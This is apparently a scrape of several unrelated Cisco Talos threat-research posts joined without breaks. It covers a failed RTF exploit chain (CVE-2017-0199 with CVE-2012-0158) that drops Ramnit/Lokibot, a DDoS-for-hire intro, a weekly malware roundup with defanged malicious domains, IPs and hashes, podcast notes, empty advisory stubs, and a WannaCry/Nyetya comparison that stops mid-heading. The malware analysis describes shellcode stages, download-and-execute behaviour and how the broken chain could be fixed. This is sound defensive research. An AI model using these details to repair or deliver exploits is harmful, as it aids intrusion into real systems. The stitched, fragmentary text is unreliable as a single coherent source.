Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.

Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.

Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn’t quite work out, or it may be indication of future attacks yet to materialise.

Standard CVE-2017-0199 exploitation

A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.



If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:

Modified CVE-2017-0199 flow

In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown "partner" is a very common social engineering trick of spammed malware.

The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve.

The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault.


The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed.


This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199.

The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check.

The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode.

The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks.

If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user.

One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.

Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness.

Second stage shellcode

The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final "download and execute" shellcode stage which eventually launches the executable payload.

The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload.


The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way.


The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server.

The DNS activity confirms our findings which document the reasons for the attack failure.

Conclusion

CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. Previous work indicates that its popularity with attackers overcame the popularity of CVE-2012-0158.

In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload.


One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.

An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file.

This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.

Coverage

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella prevents DNS resolution of the domains associated with malicious activity.

Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

IOCs

Documents

5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199
6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158

Executables

351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474
f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6
43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe
d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13

URLs

hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158
hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper
hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2

This post was authored by Dave Liebenberg


In the past few months, Talos has observed an uptick in the number of Chinese websites offering online DDoS services. Many of these websites have a nearly identical layout and design, offering a simple interface in which the user selects a target’s host, port, attack method, and duration of attack. In addition, the majority of these sites have been registered within the past six months. However, the websites operate under different group names and have different registrants. In addition, Talos has observed administrators of these websites launching attacks on one another. Talos sought to research the actors responsible for creating these platforms and analyze why they have become more prevalent lately.


In this blog post, we will begin by looking at the DDoS industry in China and charting the shift toward online DDoS platforms. Then we will examine the types of DDoS platforms created recently, noting their similarities and differences. Finally, we will look into the source code likely responsible for the recent increase in these nearly identical DDoS websites.

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 11 and August 18. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

• Doc.Downloader.Agent-6335676-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The execution chain typically is Word -> Shell function -> CMD -> PowerShell download and execute.
   
• Doc.Dropper.Agent-6335671-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
   
• Doc.Macro.JunkCode-6335442-0
  Office Macro
  Malicious Office Macros are obfuscated to prevent easy analysis. At times this results in no-operation like instructions. These no-operation (junk) instructions create artifacts that can be detected.
   
• Win.Trojan.Expiro-6335658-0
  Trojan
  This sample is a Trojan. It complicates the automated analysis and the manual debugging by using anti-debug techniques. The sample needs a proper installation of the sandbox in order to run.
   
• Win.Trojan.Ovidiy-6333880-0
  Trojan
  Ovidiy, or Ovidiy Stealer, is a Windows trojan that is still under active development. It serves as a credential stealer. Although modular in nature, it mostly targets credentials from web browser sessions. It does include some C2 functionality & will beacon out with select host information. The trojan itself is written in a .NET language & discovered samples are commonly protected with several packers specifically tailored to .NET binaries.
   
• Win.Trojan.Tinba-6333828-1
  Trojan
  Tinba is a tiny banking trojan primarily focused on stealing sensitive information from its victims via javascript injected into web browsers. The source code for Tinba was leaked in 2014, making it very easy for malware developers to adopt and modify its functionality.
   

---

Threats

Doc.Downloader.Agent-6335676-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 78[.]47[.]139[.]102
• 193[.]227[.]248[.]241
• 104[.]160[.]185[.]215

Domain Names

• campusassas[.]com
• campuslinne[.]com

Files and or directories created

• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\qdvjnh.bat
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\plzea.exe

File Hashes

• 7ffabe10f4147ce48fc9ae40cdc7778d08ac7881b779743720e2c4313592445b
• c2a3dcd915905c09026044e8da533455a2742196e4294cfffc000c048c1ea9cc
• f756ea3c00d7a3dc3ff1c0224add01e8189375a64fbcd5c97f551d64c80cbdba

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Doc.Dropper.Agent-6335671-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• iesimpianti[.]it
• janssen-st[.]de

Files and or directories created

• %TEMP%\7E94\3F4A.bat
• %AppData%\Microsoft\Office\Recent\270700481.doc.LNK
• %AppData%\Microsoft\Office\Recent\fatt.348.LNK
• \Users\Administrator\Documents\20170810\PowerShell_transcript.PC.PbSYjzuP.20170810091133.txt
• %SystemDrive%\~$0700481.doc
• %AppData%\Microsoft\CHxRthlp\api-pntw.exe
• \TEMP\~$tt.348.doc
• %TEMP%\33513.exe
• %TEMP%\7E94\3F4A.tmp
• \TEMP\fatt.348.doc

File Hashes

• 5edbc08d4e919f7186aa2b8a6e3d49ef38035c2a55b6e226910fcc60fe26a335
• bbe5988f2470a296186ca43a76636fceb523b45273a32e83aa14a8cc1f4e3a8e
• acdae0dde63863e8be98935254c901439b5fc36fb45f974fd7ce7c298e3ca0ca
• b05c34ffdc8c82862b408a1f628b21bb08362de4340d768a08c511132ce7d34d
• cad134945e7f20e99efed18650d4a7c573f8902b32c10ae89639518f94e646d0
• 0752a00c66125520f78673e70af10123cb5b78fe4786d368f7beb586d5ce3531
• ffc6c04d292e6618826bb09c8c63a06af3993e7b6b14171c45c7b44619b4421a
• 758a4e1ea1fc0c9846d21f643013fd934fd23b187ca1fd32c90334ff48a60372
• 4111dc9ca29508aa89caf873ac9359ad579270c3b3025ab0ba8098dea9c3c459
• 0524147db311dedc4631e0749bb79865ac673763bd5ebc576855fcb9431de98b
• 0e5240bf70e304781511de29a000c308f675d6209735c118cd0054b519eaa096
• 09f89667dbbd0f72478f317aed5196f743693190aa3afe1f1cfccc67dad88fb6
• 4cf480e7bab22fdd7d64c43d8f18c3c5358c25fbd063bc2d2855885b886718ac
• 6ea7a564a6a7ba8f4c97e2eaefbedafab6dd1424d56716f1255b03f8b5879161
• 3728cecd2be075b09a3a6d8d8c5923fe14cf381e3070266cf05fa51585def305
• bec41e3e8d3093b58170d743ca905af81ed745a4828a42a9d39cd3373252a84d
• bd7ed9514afabc723da282f32ad1dcfe81796a83555b7b4a6738dd0254c06ccd
• 4b495c54056aa68e91fd481168a7ddc5d5a6cae713ab359777340f1ba901ae65
• b588aa1d5901e2ded7dfc9fe8efbd13304f2bed37086b5c9aa498fdffaed48ba
• 717f927b9c0b01a60eb94254d39ac5eeee24a2c10d0c59266252630202a36323
• 056bce922fab367aabfd43f5e85bb5397755db08afcc8c38d992ffb4fe8f766f
• 3ca148e6d17868544170351c7e0dbef38e58de9435a2f33fe174c83ea9a5a7f5
• 6250f069e1268801cb3afaee2523df1aca628fa791a666f1d05b6cb981913461
• 1496ddfb94f11120267fe9d6bf233ba4726754bebf3075340496a144777a6539
• 5f1827ab138eb25289a1a76910f5dc9c96aed87dd8aa2db7e3b0d310267a5a67
• d08c719c8ea6e5d7546e6449e6aed748ce74359e7c0dbd1f9bd08e2e8b795c68
• 168c49c8207019008bdf746d0fa4ab33a154277c5fe50fd4900e9d77ec6a2e7d
• e92710c582f71c4a9cb127774fa4cce0d8abb837a38d50d22d17ef7061646c92
• f20256df607a29ef83bd035ee27fc424307712e59298f54803150a88ea5c5ece
• 190cda0ade0c0348786652b7ee12fde595e12ab561d893224cfdafbd58ec7b75
• cccb32f7f0408b32f3ad7f5a75adf1b955ba83a712e59c64f16b07713a6b44b8
• 31b34ac21405f6450bef3c18249e83a7bc464dea5cd4fb239becfe0a800875a2
• db8ee4755c2b30756abb68e14e30b7c10d283b2f989fc7f3556f92389a2c32b9
• d26ebbc2bdf6a6b59d805f7f1e9a9b505b6ff6e8b99e254f9c5c36413142d3f8
• f2fbac0942b08720073373536520b471229c918474cabb63fd19c3d006caaa1b
• 366f1f331e940a462447e2b4abe9196ae7b977d281c2b9fe5e19bb0c2927b705
• 9859e621b4d259798b2813377f9cd1736497f51cb501c6b3ea44ccae57d4e4fa
• 94395a2b7bd0a120b55e39b3107f934f9b76faa9e2679dbae1237f69f2c3f1b9
• 5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7
• 5624e26cace481fa4144f5ccd5bdcc7b5c3d42c035c88250312833041cf55807
• b0610f20ce7be29f5864a02d72bcfa54e215d3159bf381d05fac58d2fa703f0d
• 1c364ed502fa3710d9fa3c5a4a2ac6688bea3610acee2a6f958220d8ffca908b
• 36472a674c751c65c15cbaab276c0fba8f3f1709750473b24e5d3c21e468617f
• 0419cd8e5884e2918c5f0746d54efe2e2d9f0385523ecdbc395200df4004d87a
• 29a7f99f81dd37bcbd196d635837c01d2aa48045ce4efd999a6d0da92bfbe917
• 6451b45a4f8bdccdbce6bcd14e5fda1f976c81efed2c4dfd028386cce31250d1
• 7a703a5e7f30a1621e204669ffefe91f22a1619814c4ef40872cd750cffb9125
• 5de158f2b9e0039b76588fd190565bcf4e02398ec8bff57d1c55bcc1626de5f3
• f8913513ec19ea386cb812e5e7249d44a4e4a3092fbfcea23fce692d7ed88970
• 6dc6070451995a7dae4d5b741e291ce525aec2cf3144d9fdb8484f39079ef9e2
• 4808a9fc9a33cf5df06d5a56f85b6e2dfdb8fc5fbb4cbd2ede05488dd566f6f5
• eb99cecc433a5134414024c98c227f52bae7660343a36469ccf0e6a8f5af4a6d
• b3dc9a164f1548ca0fd4618dbaae44c6a9ea05f66aafcf67758d9985b1409cb0
• e14472604877ad85c119703225fb6086053bcaa2ebae60d38762bbdd192e2244
• e631b1dd070f71e53dd7b5c36a1921c027257f0c79bc7964551f27d0f4ece78b
• e342cae3c710674f0e73ea2ed1e72085d790a653e249e1b5e4d8e6696e110041
• 9f404502e944f4cd76b902abf67717054732528a9399e23b3d90e2825316818d
• f6c2aea9dbc12ff2dbf77637560093234465cdae03c40ee4f0afcf8365ebfab7
• b3fffd7e92a3bb920456b149717c353c8779e45a947c0e756889956c6bc48d7a
• 45112ef00b7d34a471655f3a7318fd2b69de1ade1889647839ff897c6e6f1c67
• 9d52dd2437d0408e5971598b44c5dc1e1475004241bb5928d1eaee9a9aea51e1
• 947ec2662ab377aca91f9ccb5b2a0e823ab5b814be719494c5cb8f0e7e228252
• d076c672bdb9bd3b738edb882560482bebde469d02acd1ccda11e9c9cb6feaeb
• dcfddf26b9699622bde12c6b64a78e5446172e57c5a29c3ea0267a0df85bc1e3
• 0db7513e4ec8cea44afdce2d37991f5f9cbde0bb779856c10d9ffa75bed53d0f
• b1e4e3be5dd686424763f39f8930e28044a9cda7a48d8962ba6e8978ef532fa0
• 31755c56408a13f44d620971a60342bb0170ad78217c923c518fe4b58b4da365
• 27772ef48d027d7e23e1f78d8ea86cb1bbcf4240cd59a8dc7ebc82f8a3a8b6dd
• a31cbc1ce4abaa2ba7cab9ff97e1f647c3b1264c9cb7db0e20c74d151db2634d
• c685f1c782e6b9250035f922ebc80400f2d6515e5f343a933c6c12920eb89e92
• 5dd873a5cd07c4ac6edc7bfad7c92e1111cbddab5e72de96291e2990e0ab62e0
• 8c43427b886d65c06a43f823511f0927b85dc5956dc7bd1bd16c59af548db6b8
• 2aaf7791ed0a57e48c3d363b46ba5247e78a2290549bfd7f98793e9bee4c3e55
• 9b6d3e01584f4d1238a55050c7ffad0e14299e911db8497b81529bd58afa4bc7
• d526ffe1710b4b39866bebceb3660e1386e41df17b13a6055078b0ce7db74fbe
• 425e004b3c9034aa17071b137ca1d4ae7a35dde5f588c05295e491b716125e2a
• 8c4813043fa78b4aec7ada10556ddbe06eedbc81b115e4ff08371d8ee132d645
• c7cab605153ac4718af23d87c506e46b8f62ee2bc7e7a3e6140210c0aeb83d48
• d52318c1f83d086fcb94b8ae7288f2acb85f6e441c66a3f1d09365a1018c80bd
• 44b6060a5406112556049bd3efef8d876fe335bb4aa0f0a6f7d0210184918c71
• 4e812653205426b75038ce2796be5b254b61ee02da376462f3ad1ac23d898282
• 454ed2ca7a116ad34864d4e8b232dcb50c063ffbd70f23753262aabb6b34d24e
• bf958c7ba44b9dfdcba50eeb6f7b59fe3bd2948f1ab1a7c8ee0f162b7cac3b2c
• de0e7aae207f7a7a1f242d849bb61c7f4e98d84f74b228439d296e6a46b2f812
• 712a907f98efa76de2b349c90084fbef6d40d9df32a41df98fc62e19fab5329d
• 3d081fe6a220b546af09139fda7deceb5e7f16b52fb47d15ff4e69bab9175734
• f0b670afe4781d3e8899bf742fbd613636424681f56c4388168acea84ea344af
• 976c6ce6c484aef7d0d801c2f5ee31c984136d91636656a7e5425fbc4e848029
• 37e79b45ee53bc266d3602ec2cb79762a3c6360b5c173e89da045491150dbfb1
• a4692d62273960b017d80e2b3ee9befe9b186d0609dbf4aedd1dcaf6d3aef671
• c3e6a58e8a68518ffb43ee9026508b6520016e8d7096bf94ec2d1ed5cd328d76
• e8290589cab3707f80ada754a31263e239b870dac5bdece15bf2e331cae5acf1

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Doc.Macro.JunkCode-6335442-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe

Mutexes

• Local\_!MSFTHISTORY!_

IP Addresses

• 52[.]173[.]193[.]166
• 185[.]206[.]144[.]152
• 190[.]107[.]177[.]115

Domain Names

• plantatulapiz[.]cl
• kalawatu[.]site

Files and or directories created

• %TEMP%\CVRDF32.tmp.cvr

File Hashes

• a5eb0f2e7d972b47c5016dd755bfce2e794822ef6933ff9759fd70e72b137a16
• 404987cbcc932ba68aa9abd4607ea81ba4feb167c3f333c800a56cb2620ffd9f
• 046809ff996329f2bb539128d51a0c21179ac6d117688281dd927df4b0aaf85b
• 9679b02ca07d40f2d2d84445b5683fe2c1a135ecf73886d2ed27dc387b108417
• 3a79a33855731c0066016de8baf9ef6b946b06b1ce4fda28f3c68265afa6c89a
• 3b0997b98551548002dd9cd977cd3f881f0496ab2f86ef1a90d6c7a13765366c
• 148b0ed81c95496d80778c7d3d093627a7395b76bf9b457f958201be66e8ea1f
• 9ba948417071478c1fa3fe89c46c19c56190f47f2ba141a446166eff5a71fbb4
• 1a1a48c35aee34ba91d83ae97865d75319112165ee8e7dad7cb7714ab57c40b7
• 5b1e2ebb1baa600fba198e5c233ebb431311c976ef23f5c2f2c74ff03392a824

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Expiro-6335658-0

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
• Value: Collection

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• \TEMP\60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0.exe

File Hashes

• 60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0
• 5fd134b6abe1473fd5a7f96c711a4270fbc364bc6e3b10b5b344e0a1bfb0e4d8
• 5f5e9e5952765887211883b42e508b4b14c62a1685092978f98c6619229796b5
• 5fe205ea4f5f975703e242e8079dc471a5363538535d76584e7138ed3fb67546
• 5ffa0097ebcba0e1921c6607a644e2649532ae07b1c7d6533a3cbef52ee51620

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.Ovidiy-6333880-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
• Value: EnableFileTracing
• <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASMANCS
• Value: ConsoleTracingMask
• <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
• Value: EnableConsoleTracing
• <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
• Value: FileTracingMask
• <HKLM>\Software\Microsoft\WBEM\CIMOM
• <HKCU>\Software\Microsoft\SystemCertificates\My
• <HKLM>\System\CurrentControlSet\Services\EventLog\System\Schannel
• <HKLM>\Software\Microsoft\SystemCertificates\CA
• <HKLM>\Software\Microsoft\SystemCertificates\Disallowed
• <HKLM>\Software\Microsoft\SystemCertificates\TrustedPeople
• <HKLM>\Software\Microsoft\SystemCertificates\trust
• <HKLM>\Software\Microsoft\Tracing\6838bce2f6c831414df831040fc14287_RASMANCS

Mutexes

• N/A

IP Addresses

• 104[.]27[.]132[.]79
• 104[.]27[.]133[.]79

Domain Names

• ovidiystealer[.]ru

Files and or directories created

• N/A

File Hashes

• c16408967de0ca4d3a1d28530453e1c395a5166b469893f14c47fc6683033cb3
• 062bd1d88e7b5c08444de559961f68694a445bc69807f57aa4ac581c377bc432
• 22fc445798cd3481018c66b308af8545821b2f8f7f5a86133f562b362fc17a05
• 80d450ca5b01a086806855356611405b2c87b3822c0c1c38a118bca57d87c410
• 8f6939ac776dac54c2433b33386169b4d45cfea9b8eb59fef3b922d994313b71

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Tinba-6333828-1

Indicators of Compromise

Registry Keys

• HKU\Software\Microsoft\Windows\CurrentVersion\Run

Mutexes

• \BaseNamedObjects\5E60878D

IP Addresses

• N/A

Domain Names

• recdataoneveter[.]cc

Files and or directories created

• %AppData%\5E60878D\bin.exe

File Hashes

• 0ce6189ecd16fbf2f885a8516836c7bb9d0685f6ff2c4a3df80e236ef5d0d803
• 33fd66f4cee5bdd9f30eb2e5bd7a65367e10f55495c1122430685a8ff0d90fcc
• 51769c916a89522975cb1babb4c9c7b18f3530286c66f3d735751cbdac02a160
• 56f91537753491cd32a250428b146d7685362c762c7e8f39703b4cf6cd92c020
• 6fd80f8da071c3dc482314cbc994b22f105bce22acdad9e9bd86bae5abed53d9
• 7607a0e1be2a8f50959ef42b78edd156aa76741fdc8ee2be9d375610c0b130b2
• 7bbd6d3d6bf6e991e023395e3cb31c18b2a106eef036ad175736a17fb1099b39
• 856ed534a7c32ab7799756c33f7ee104718c89add001428a41dc57e8449167c8
• 968ff771eab9d14d1847f489f425e44532522c7b9fe7407b09d7cc594da0eb84
• e2776a037dcad9e2c752ac4f07dfae0412312ba9b1b748a48922ed572f83eb9c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Overview

TALOS-2017-0322

TALOS-2017-0323

Coverage

Beers with Talos (BWT) Podcast Episode 11 is now available.  Download this episode and subscribe to Beers with Talos:
If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

Beers with Talos is a fast-paced, smart, and humorous podcast focused on security research topics. Staying abreast of security topics is difficult in this rapidly evolving threat landscape. Beers with Talos serves important security stories in a way that is understandable, engaging, and fun to researchers, executives, and security n00bs alike.

EP11 Show Notes: 

Better late than never? On top of being distributed all around the planet this week, we had some technical issues with our recording platform that created a nice audio jigsaw puzzle to solve. Matt’s audio remained a challenge; it is rough this week. Bear with us, the audio quality will be back to what you have come to expect next episode. If you would like to speak to the manager, please hold.

The last several years have seen a continuing surge in booters, DDOS, and combined exploit campaigns for-hire coming out of Asia and other regions. What does this tell us about the continued “professionalization” of the cyber criminal enterprise? What happens now that the playing field is leveled and launching these attacks requires nothing more than a few hundred USD in cryptocurrency?

We also discuss “hacking back” - some say it should be legal. Most people who know what they are talking about seem to think otherwise. Despite several strained analogies involving arms dealers, various calibers of ammo, and other nonsense, the crew makes a point about what it actually solves (hint: not much, especially considering the low chances of 100% certainty for most observers)

EP11 Timetable:

00:47 - Roundtable
16:13 - Booters, DDOS, and Combo Exploits, oh my!
30:45 - Hacking back - the ACDC Act (copyright 2017 Talos) and other terrible ideas
58:15 - Parting shots - How to win Powerball with this one weird timezone trick!

==========
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Update: 9/1/17 - National Instruments has published the following advisory

Overview

TALOS-2017-0273 code execution vulnerability (CVE-2017-2779)

Discussion

Coverage

Overview

Vulnerability discovered by Marcin Noga of Cisco Talos.

This post was authored by Edmund Brumaghin

"Those who cannot remember the past are condemned to repeat it." - George Santayana

The Prequel

In March 2017, Microsoft released a security update for various versions of Windows, which addressed a remote code execution vulnerability affecting a protocol called SMBv1 (MS17-010). As this vulnerability could allow a remote attacker to completely compromise an affected system, the vulnerability was rated "Critical" with organizations being advised to implement the security update. Additionally, Microsoft released workaround guidance for removing this vulnerability in environments that were unable to apply the security update directly. At the same time, Cisco released coverage to ensure that customers remained protected.

The following month, April 2017, a group publishing under the moniker "TheShadowBrokers" publicly released several exploits on the internet. These exploits targeted various vulnerabilities including those that were addressed by MS17-010 a month earlier. As is always the case, whenever new exploit code is released into the wild, it becomes a focus of research for both the information security industry as well as cybercriminals. While the good guys take information and use it for the greater good by improving security, cybercriminals also take the code and attempt to find ways to leverage it to achieve their objectives, whether that be financial gain, to create disruption, etc.

Ransomware Worms

Computer worms are not a new concept. Worms are different from other malware in that they self-propagate within and between systems; for example, Conficker is a computer worm that used a Windows vulnerability to propagate (MS08-067) and dates back to 2008. In fact, Conficker is still floating around the internet spreading from vulnerable system to vulnerable system almost 10 years later. What the past has taught us is that whenever exploit code is released in the wild for vulnerabilities that are "wormable", worms will be created and distributed. While this doesn't happen often, when it does, the impact worms can have around the world is significant. In 2017, we have seen this twice so far. What is new, however, is the use of computer worms to spread ransomware and other destructive malware. Enter WannaCry and Nyetya.

WannaCry

Moving forward in time, in May 2017, we saw the introduction of WannaCry into the threat landscape. WannaCry was created as a ransomware worm, meaning that it leveraged vulnerabilities in Windows to spread itself and infect additional systems without requiring explicit user interaction. WannaCry leveraged the vulnerability addressed two months prior (MS17-010) to perform this propagation. Once systems were infected, ransomware would be installed and their system would be used to propagate the attack to other systems. This quickly lead to a snowball effect with more and more systems becoming infected and actively attempting to spread the malware. The damage created by WannaCry was global, with many organizations around the world either directly affected due to infections, or indirectly due to issues caused elsewhere by the malware.

Nyetya

Fast forwarding to June 2017, a second, more sophisticated attack leveraged the same vulnerabilities, for which security updates had been released months prior. This particular attack can be labeled as more sophisticated for a number of reasons. First, it leveraged what's known as a "supply-chain attack" as the initial vector for compromising organizations. In supply-chain attacks, the attackers take advantage of a trusted relationship between an organization and a vendor or supplier. In this case, the attackers behind Nyetya compromised a software update server used extensively by businesses and organizations in Ukraine. They leveraged the compromised server to deploy backdoored versions of the software under the guise of software updates. Once backdoored, the attackers could distribute their malware directly into the targeted environments. In this particular case, the malware caused significant system impact and leveraged multiple methods for propagating throughout the network in compromised organizations. In a similar fashion to WannaCry, this resulted in many organizations facing significant operational disruption, however in this case, the damage was mainly focused within Ukraine.

WannaCry vs. Nyetya

There are significant differences between these two pieces of malware. As previously mentioned, Nyetya can be considered significantly more sophisticated for a number of different reasons, which are detailed in the following sections. One example of the difference in sophistication between these two worms lies in the code itself. WannaCry featured multiple bugs (including a broken scanning function) which might be indicative of differences in the skill level of the attackers who created WannaCry versus those who created Nyetya. The major differences between these two worms can be characterized by how malware was delivered, the methods of propagation used by the malware, as well as the mission objective of the attackers who distributed them.

Delivery

